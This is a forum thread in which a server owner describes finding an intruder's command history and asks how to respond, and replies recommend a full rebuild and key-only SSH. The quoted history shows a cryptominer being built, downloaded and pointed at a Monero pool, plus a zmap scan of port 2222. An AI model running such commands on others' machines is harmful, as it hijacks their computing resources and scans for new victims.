I have been running an Ubuntu Server 14.04 LTS, mainly for samba as file server. The server runs fine unattended and so I do not need to login to the server for several days. When I logged into the server today, I found some suspicious activity in command history. While searching web for the commands used, I came to know its something about cryptocurrency / bitcoins etc. Following I found in command history: Code: cd /usr/local/games ls mkdir miner clear cd miner ls clear sudo apt-get install -y git automake pkg-config build-essential libcurl4-openssl-dev git clone https://github.com/wolf9466/cpuminer-multi cd cpuminer-multi ./autogen.sh CFLAGS="-march=native" ./configure make ./minerd -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 cat /proc/cpuinfo ./configure --disable-aes-ni make ./minerd -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 Code: wget https://sourceforge.net/projects/cpuminer/files/pooler-cpuminer-2.4.4-linux-x86_64.tar.gz tar xvf pooler-cpuminer-2.4.4-linux-x86_64.tar.gz ./minerd -a cryptonight Code: apt-get install zmap zmap -p 2222 While checking for log, I found all log files are of 0 size in /var/log and datestamp of November 25. As precaution, I stopped port forward for port # 22 on my firewall, and changed passwords. Kindly guide, what should I do further. ~Dipesh
If you suspect the server has been compromised, the only thing you can do is set it up anew. You can't trust it anymore until then.
Restore to an older image made before this intrusion happened. Then, change ssh login method to Key-only.
if one has an image... but then, that older image might have the same security issue... I still recommend to re-setup everything.
